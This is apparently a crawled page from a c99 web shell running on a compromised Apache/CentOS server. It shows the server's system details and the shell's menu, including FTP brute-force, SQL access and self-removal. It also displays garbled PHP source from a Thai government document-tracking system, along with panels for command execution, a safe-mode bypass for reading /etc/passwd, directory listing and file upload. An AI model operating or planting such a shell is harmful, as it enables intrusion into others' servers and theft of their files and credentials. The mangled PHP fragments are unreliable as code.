!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/   drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     printRepFollowDocDeptDetail.php (34.04 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
SearchMaxDocGroup(); $oDoc->SearchByKey($DocID); $oDoc->GetRecord(); $oDlc->SearchByKey($DLCID); $oDlc->GetRecord(); $oRs->SearchByKey($DrsID); $oRs->GetRecord(); ?> รายละเอียดหนังสือราชการ

ข้อมูลทั่วไปของหนังสือราชการ OIS...
DtID!=13){ ?> DtID==1 || $oDoc->DtID==2 || $oDoc->DtID==3 || $oDoc->DtID==14 || $oDoc->DtID==13 || $oDoc->DtID==15){?> DtID==13){?> DtID==1 || $oDoc->DtID==2 || $oDoc->DtID==14 || $oDoc->DtID==3 || $oDoc->DtID==15){?> DtID==1 || $oDoc->DtID==2) && ($oDoc->RsID=="2" || $oDoc->RsID=="1")){?> DtID==3 && ($oDoc->RsID=="4" || $oDoc->RsID=="3")){?> DtID==1 || $oDoc->DtID==2 || $oDoc->DtID==3 || $oDoc->DtID==14 || $oDoc->DtID==15){?> DocforSign=="Y"){ ?> sendToPs=="Y"){ ?> AnID!="0"){ ?> DrsSendDate!="0000-00-00"){ ?> DrsDocDueDate!="0000-00-00"){ ?>
">  DtID); ?> : "> DtID!="15"){ if($oDoc->DocNo!=""){ echo $oDoc->DocNo; } }else{ echo '-';} ?>
">  DtID); ?> :"> DocDate!="" && $oDoc->DocDate!="0000-00-00"){ echo " ".abbreDate2($oDoc->DocDate,'/'); } ?>
" >  DtID); ?> :"> DocSubject!=""){ echo $oDoc->DocSubject; } ?>
">  DtID); ?> : "> DocFrom!=""){ echo $oDoc->DocFrom; } ?>
">  ชื่อผู้ได้รับการรับรอง : "> CertificatePs!=""){ echo $oDoc->CertificatePs; } ?>
">  DtID==3 || $oDoc->DtID==15){ echo "เรียน"; }else{ echo "ถึง"; } ?> : "> DocTo!=""){ echo $oDoc->DocTo; }?>
">  แฟ้มหนังสือ : "> DocPID=="0" || $oDoc->DocPID==""){ $searchDoc=$oDoc->DocID; }else{ $searchDoc=$oDoc->DocPID; } ?> ">   แฟ้มที่เกี่ยวข้อง CountDocByDocID($searchDoc)); ?> รายการ
SearchByDocID($searchDoc); while($oDatt->GetRecord()){ $c++; $pathfile="../documents/".$oDatt->DaUpFileName; ?>  เปิดดูแฟ้มหนังสือ  DaFileName."
"; } ?>
">  อ้างถึง :"> DocRef!=""){ echo $oDoc->DocRef; } ?>
">  สิ่งที่ส่งมาด้วย :"> DocOther!=""){ echo $oDoc->DocOther; }?>
">  อ้างถึงหนังสือเพื่อตอบกลับ :"> DocRefAns!=""){ echo $oDoc->DocRefAns; } ?>
">  ชั้นความเร็ว : "> SearchByKey($oDoc->DslID); $oDsl->GetRecord(); echo " ".$oDsl->DslName;?>
">  ชั้นความลับ :"> SearchByKey($oDoc->DclID); $oDcl->GetRecord(); echo " ".$oDcl->DclName;?>
">  หมายเหตุ : "> DocShortDesc!=""){ echo " ".$oDoc->DocShortDesc; } ?>
    ลงทะเบียนหนังสือลงนาม
    ส่งด่วน

รายละเอียดการส่ง รับทราบ การดำเนินงาน
">  ผู้ส่ง : ">  SearchByKey($oRs->DlcID); $oDlc8->GetRecord(); $oPS7->SearchByKey($oDlc8->personId); $oPS7->GetRecord(); echo GetPrefix($oPS7->prefixId).$oPS7->fName." ".$oPS7->lName; ?>
">  ลักษณะหนังสือ : ">  SearchByKey($oRs->PtID); $oPt->GetRecord(); echo $oPt->PtName; ?>
">  ข้อมูลขึ้นเว็บ : ">  SearchByKey($oRs->AnID); $oAn->GetRecord(); echo $oAn->AnName; ?>
  แจ้งขึ้นเว็บ DocShowInOut); ?>
  วันที่ประกาศขึ้นเว็บ  DrsstartDatePost!="0000-00-00"){ if($oRs->DrsstartDatePost==$oRs->DrsendDatePost){ echo abbreDate2($oRs->DrsstartDatePost,'/'); }else{ echo abbreDate2($oRs->DrsstartDatePost,'/')." ถึง ".abbreDate2($oRs->DrsendDatePost,'/'); } } ?>
">  ว/ด/ป ที่สั่งการ : "> DrsSendDate!="0000-00-00 00:00:00"){ list($DocD,$DocT) = split(' ',$oRs->DrsSendDate); echo " ".abbreDate2($DocD,'/')." ".a2th($DocT);}?>
">  ว/ด/ป ที่กำหนดเสร็จ : "> DrsDocDueDate!="0000-00-00"){ echo " ".abbreDate2($oRs->DrsDocDueDate,'/'); }else{ echo "-"; } ?>
RsID!='2'){ //send out ?> ">SearchByDrsFromDrsID($DrsID); while($oRs8->GetRecord()){ ?>
ผู้รับหนังสือสถานะ
การรับทราบ
สถานะ
เวลา
หมายเหตุ
personId==0){ $oDlc->SearchByKey($oRs8->DlcID); $oDlc->GetRecord(); $oDP->SearchByKey($oDlc->deptId); $oDP->GetRecord(); $oPS->SearchByKey($oRs8->DrsReceivePersonId); $oPS->GetRecord(); if($oRs8->DrsReceivePersonId!='0'){ echo " ".GetPrefix($oPS->prefixId).$oPS->fName." ".$oPS->lName.'
'; } echo " สารบรรณย่อย"; echo "  (".$oDP->deptName.")"; $nomainps=1; $sendtodept=1; }else{ $sendtodept=''; $oPS->SearchByKey($oRs8->personId); $oPS->GetRecord(); echo " ".GetPrefix($oPS->prefixId).$oPS->fName." ".$oPS->lName; if($oRs8->DrsMainPs=="Y"){ echo " [ผู้รับผิดชอบหลัก]"; $nomainps=0; }else{ $nomainps=1; } if($oRs8->DrsSendToPs=="Y"){ echo " [ส่งด่วน]"; } } if($oRs8->DrsSendDocNew !="0000-00-00 00:00:00"){ echo "
  [ส่งเพิ่มเติม] "; list($DocD,$DocT) = split(' ',$oRs8->DrsSendDocNew); echo abbreDate2($DocD,'/')." ".a2th($DocT); echo ""; } ?>
SearchByDrsFromDrsID($oRs8->DrsID); $oRs9->GetRecord(); if($oRs8->DrsSendDate!="0000-00-00 00:00:00" && $oRs9->DsID!='6' && $oRs9->DsID!='7' ){ list($DocD3,$DocT3) = split(' ',$oRs8->DrsSendDate); echo "รับทราบ::
".abbreDate2($DocD3,'/')."
".a2th($DocT3);} if($oRs9->DsID=='6'){ echo "ไม่รับทราบ"; } if($oRs9->DsID=='7'){ echo "แจ้งการส่งผิด"; } }else{ if($oRs8->DsID=="4" && $oRs8->DrsDocReceiveDate=="0000-00-00 00:00:00"){ echo "เปิดหนังสือ"; }else if($oRs8->DsID=="5" && $oRs8->DrsDocReceiveDate=="0000-00-00 00:00:00"){ echo "เปิดแฟ้มหนังสือ"; }else if($oRs8->DsID=="5" && $oRs8->DrsDocReceiveDate!="0000-00-00 00:00:00"){ list($DocD2,$DocT2) = split(' ',$oRs8->DrsDocReceiveDate); echo "รับทราบ::
".abbreDate2($DocD2,'/')."
".a2th($DocT2).""; } if($oRs8->DrsDelete=='Y'){ echo 'ลบหนังสือ'; } if($oRs8->DsID=="7" && $oRs8->DrsDocReceiveDate!="0000-00-00 00:00:00"){ list($DocD2,$DocT2) = split(' ',$oRs8->DrsDocReceiveDate); echo "แจ้งการส่งผิด::
".abbreDate2($DocD2,'/')."
".a2th($DocT2).""; } } ?>
DocRefAnsDate!="0000-00-00 00:00:00"){ list($DocD2,$DocT2) = split(' ',$oRs8->DocRefAnsDate); if($DocD2>$oRs->DrsDocDueDate){ echo '
หลังเวลากำหนด
'; }else if($DocD2==$oRs->DrsDocDueDate){ echo '
ตามเวลากำหนด
'; }else{ echo '
ก่อนเวลากำหนด
'; } echo abbreDate2($DocD2,'/')."
".a2th($DocT2); }else{ echo '
ยังไม่ปฏิบัติ
'; } } ?>
 
">SearchDocSend($GLOBALS["COLLEGEID"],$DocID); while($oTsr->GetRecord()){ $oCd->SearchByKey($oTsr->tsr_to_node); $oCd->GetRecord(); ?>
ผู้รับหนังสือ สถานะหมายเหตุ
collegeAbbr; if($oTsr->tsr_SendNew!="0000-00-00 00:00:00"){ list($DocD2,$DocT2) = split(' ',$oTsr->tsr_SendNew); echo "
[ส่งเพิ่มเติม ".abbreDate2($DocD2,'/')." ".a2th($DocT2)."]"; } ?>
  tsr_status); ?>  
" size="2">** ไม่มีรายการหนังสือที่ส่งถึงผู้รับผิดชอบแล้ว **

  
" size="2"> เส้นทางเดินของหนังสือ

DocGroup,$oDoc->DsID,$DrsID).$oRs->DrsID; /* $lineDoc=GetLineDoc($DocID,$oDoc->DocGroup,$oDoc->DsID,$DrsID); $checkshow=0; if($lineDoc!=$DrsID){ $lineDoc=$lineDoc.$oRs->DrsID; $checkshow=1;} */ //echo "=".$lineDoc."
"; // echo "-)=".$DocID."-".$oDoc->DocGroup."-".$oRs->DrsID."
"; // $lineDoc=GetLineDoc2($oDoc->DocGroup,$oRs->DrsID); //echo "lineDoc=".$lineDoc."
"; while($lineDoc!=""){ list($line,$lineDoc)=split(',',$lineDoc,2); //echo "=".$line."
"; $oRs2->SearchByKey($line); $oRs2->GetRecord(); $oDoc2->SearchByKey($oRs2->DocID); $oDoc2->GetRecord(); $oDlc3->SearchByKey($oDoc2->DlcID); $oDlc3->GetRecord(); if($oRs2->DsID=="1"){ ?>
  ข้อมูลการลงรับของหน่วยงาน SearchByKey($oDlc3->deptId); $oDP->GetRecord(); echo $oDP->deptName;?>
  ชนิดหนังสือ : SearchByKey($oDoc2->DtID); $oDt->GetRecord(); echo $oDt->DtName; ?> เลขทะเบียนRsID);?> : DocTypeNo);?> วันที่ลงทะเบียน : DocDateCreate); echo abbreDate2($DocD,'/')." ".a2th($DocT); ?>
  ลงรับโดย : SearchByKey($oRs2->DrsReceivePersonId); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName; ?> SearchByKey($oDlc3->DlpID); $oDlp->GetRecord(); echo " (".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->deptName).")"; ?>

DsID=="2"){ ?> SearchByKey($oRs2->DrsFromDrsID); $oRs3->GetRecord(); ?>
  ข้อมูลการเสนอลงนาม
">  การบันทึกต่อเนื่อง : "> DrsPropose); ?>
">  ผู้เสนอลงนาม : " align="center"> SearchByKey($oRs2->DrsPsIDCreate); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName." "; ?> SearchByKey($oRs2->DrsDlcIDCreate); $oDlc5->GetRecord(); $oDlp->SearchByKey($oDlc5->DlpID); $oDlp->GetRecord(); echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).") "; list($DocD,$DocT) = split(' ',$oRs2->DrsReceiveDate ); echo "
".abbreDate2($DocD,'/')." ".a2th($DocT); ?>

DrsWSign=='Y'){ //case DrsWSign $oDws->SearchByDrsIDDocID($oRs2->DrsID,$oRs2->DocID); $oDws->GetRecord(); ?>
  ข้อมูลการรอเสนอผอก./หน.
">  การบันทึกต่อเนื่อง : "> DocSign); ?>
">  ผู้ลงนาม : " align="center"> SearchByKey($oDws->personId); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName." "; ?> SearchByKey($oDws->DlcID); $oDlc5->GetRecord(); $oDlp->SearchByKey($oDlc5->DlpID); $oDlp->GetRecord(); echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).") "; list($DocD,$DocT) = split(' ',$oDws->signDateTime); echo abbreDate2($DocD,'/')." ".a2th($DocT); ?>

DsID=="3"){ $oRs4->SearchByKey($oRs2->DrsFromDrsID); $oRs4->GetRecord(); if($oRs4->DrsByPass!="Y"){ ?>
  ข้อมูลการลงนาม
">  การบันทึกต่อเนื่อง : "> DrsSign); ?>
">  ผู้ลงนาม : " align="center"> SearchByKey($oRs2->DrsPsIDCreate); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName." "; ?> SearchByKey($oRs2->DrsDlcIDCreate); $oDlc5->GetRecord(); $oDlp->SearchByKey($oDlc5->DlpID); $oDlp->GetRecord(); echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).") "; list($DocD,$DocT) = split(' ',$oRs2->DrsReceiveDate ); echo "
".abbreDate2($DocD,'/')." ".a2th($DocT); ?>

DsID=="0" || $oRs2->DsID=="4" || $oRs2->DsID=="5"){ //$oRs6->SearchByDocGroupDrsFromDrsID($oRs2->DocGroup,$oRs2->DrsID); $oRs6->SearchByKey($oRs2->DrsID); $oRs6->GetRecord(); //if($oRs2->DrsSendDate!="0000-00-00 00-00-00"){ //show status=3 send to person ?> PtID!=0 && $oRs6->PtID!=""){ $oPt->SearchByKey($oRs6->PtID); $oPt->GetRecord(); ?> DrsSendDocNew!="0000-00-00 00:00:00"){ ?> AnID!=0 && $oRs6->AnID!=""){ $oAn->SearchByKey($oRs6->AnID); $oAn->GetRecord(); ?> SearchByKey($oRs6->DocID); $oDoc3->GetRecord(); //echo "----".$oDoc3->DocID; if($oRs6->DrsDocDueDate!="0000-00-00"){ ?> SearchByDrsFromDrsIDDrsMainPsY($oRs6->DrsFromDrsID); if($MainPs!="" && $MainPs!="0"){ $oPS2->SearchByKey($MainPs); $oPS2->GetRecord(); ?>
  ข้อมูลการส่งถึงผู้รับผิดชอบ
">  ส่งเพิ่มเติม : ">    DrsSendDocNew); echo abbreDate2($DocD2,'/')." ".a2th($DocT2); ?>
">  ลักษณะหนังสือ : ">    PtName; ?>
">  ข้อมูลขึ้นเว็บ : ">    AnName; ?>
    แจ้งขึ้นเว็บ DocShowInOut); ?>
    วันที่ประกาศขึ้นเว็บ  DrsstartDatePost!="0000-00-00"){ if($oRs6->DrsstartDatePost==$oRs6->DrsendDatePost){ echo abbreDate2($oRs6->DrsstartDatePost,'/'); }else{ echo abbreDate2($oRs6->DrsstartDatePost,'/')." ถึง ".abbreDate2($oRs6->DrsendDatePost,'/'); } } ?>
">  การบันทึกต่อเนื่อง : "> DrsPropose); ?>
">  ผู้ส่งหนังสือ : " align="center"> SearchByKey($oRs6->DrsPsIDCreate); $oPS->GetRecord(); ?> prefixId).$oPS->fName." ".$oPS->lName." "; ?> SearchByKey($oRs6->DrsDlcIDCreate); $oDlc5->GetRecord(); $oDlp->SearchByKey($oDlc5->DlpID); $oDlp->GetRecord(); echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).") "; $oRs10->SearchByKey($oRs6->DrsFromDrsID); $oRs10->GetRecord(); list($DocD,$DocT) = split(' ',$oRs10->DrsSendDate); echo "
".abbreDate2($DocD,'/')." ".a2th($DocT); ?>
">  กำหนดระยะเวลาดำเนินการ : ">    ภายในวันที่ DrsDocDueDate,'/');?>
">  ผู้รับผิดชอบหลัก: ">    prefixId).$oPS2->fName." ".$oPS2->lName." "; ?>

 

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.005 ]--